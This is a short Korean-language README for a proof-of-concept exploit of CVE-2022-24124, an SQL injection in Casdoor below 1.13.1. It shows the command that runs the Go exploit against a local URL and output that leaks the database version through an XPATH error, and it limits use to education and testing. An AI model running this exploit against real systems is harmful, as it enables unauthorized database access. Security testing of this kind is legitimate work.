
CVE-2022-24124용 POC
CVE-2022-24124 즉 Casdoor SQL Injection에 대한 익스플로잇 코드
익스플로잇 링크: [ExploitDB-50792] [PacketStormSecurity]
예상 결과: Casdoor < 1.13.1을 실행 중인 호스트에서 SQL 데이터베이스 버전 덤프
교육 및 기업 환경에서의 테스트 용도로만 사용하십시오.
Barricade➜ go run exploit.go -u http://127.0.0.1:8080
-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)
[*] Dumping Database Version
XPATH syntax error: .12-MariaDB-0+deb11u1